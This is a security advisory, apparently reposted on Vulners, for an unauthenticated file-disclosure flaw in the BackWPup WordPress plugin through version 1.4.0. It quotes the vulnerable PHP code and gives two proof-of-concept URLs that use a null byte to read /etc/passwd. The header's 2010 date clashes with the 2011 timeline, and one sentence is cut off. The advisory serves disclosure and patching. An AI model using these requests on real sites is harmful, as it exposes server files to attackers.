`=============================================
- Release date: Feb 28th, 2010
- Discovered by: Danilo Massa
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
BackWPup Wordpress plugin <= 1.4.0 File content disclosure
II. BACKGROUND
-------------------------
BackWPup 1.4.0 is a full-featured backup management solution for Wordpress.
The plugin provide:
- Database Backup
- WordPress XML Export
- Optimize Database
- Check\Repair Database
- File Backup
- Backups in zip,tar,tar.gz,tar.bz2 format
- Store backup to Folder
- Store backup to FTP Server
- Store backup to Amazon S3
- Store backup to RackSpaceCloud
- Store backup to DropBox
- Send Log/Backup by eMail
III. INTRODUCTION
-------------------------
BackWPup version 1.4.0 (and may be the previous ones too) has an unfiltered
parameter inside
two php pages that let a remote user to access sensitive files like /etc/passwd.
No authentication required. No plugin activation required.
IV. DESCRIPTION
-------------------------
Input passed via the "wpabs" parameter to the php pages
- wp-content/plugins/backwpup/app/options-view_log-iframe.php
- wp-content/plugins/backwpup/app/options-runnow-iframe.php
is not sanitized before being used.
Both files starts trying to include the wp-load.php file using the wpabs
parameter that can
be inject with a direct call to the page.
options-view_log-iframe.php:
<?PHP
if (file_exists($_GET['wpabs'].'wp-load.php') and file_exists($_GET['logfile']))
{
require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...
options-runnow-iframe.php:
if (file_exists($_GET['wpabs'].'wp-load.php') and
is_numeric(trim($_GET['jobid']))) {
require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...
inserting a string terminator %00 inside the wpabs parameter is possible to
specify a file
name instead of a directory and let it being included in the web page.
NOTE: also the
V. PROOF OF CONCEPT
-------------------------
Below is a harmless test that can be executed on a Unix machine that hosts
wordpress with the
vulnerable plugin.
http://<wordpress_site>/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1
http://<wordpress_site>/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd
Both of them will display the /etc/passwd file.
VI. BUSINESS IMPACT
-------------------------
An attacker could exploit the vulnerability to retrieve virtually any text file
accessible by the wep application server user.
VII. SYSTEMS AFFECTED
-------------------------
Version 1.4.0 is vulnerable.
Versions <1.4.0 could be vulnerable.
VIII. SOLUTION
-------------------------
Upgrade to a patched release or as quick workaround enclose
any $_GET['wpabs'] in a trim call like this:
if (file_exists(trim($_GET['wpabs']).'wp-load.php') and
file_exists($_GET['logfile'])) {
IX. REFERENCES
-------------------------
http://wordpress.org/extend/plugins/backwpup/
http://danielhuesken.de/portfolio/backwpup/
X. CREDITS
-------------------------
The vulnerability has been discovered by Danilo Massa
danilo(under_score)m(at)yahoo(dot)com
XI. VULNERABILITY HISTORY
-------------------------
January 28th, 2011: Vulnerability identification
January 30th, 2011: Vendor notification
January 30th, 2011: Vendor release an updated version (1.4.1)
February 28th, 2011: Vulnerability disclosure
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation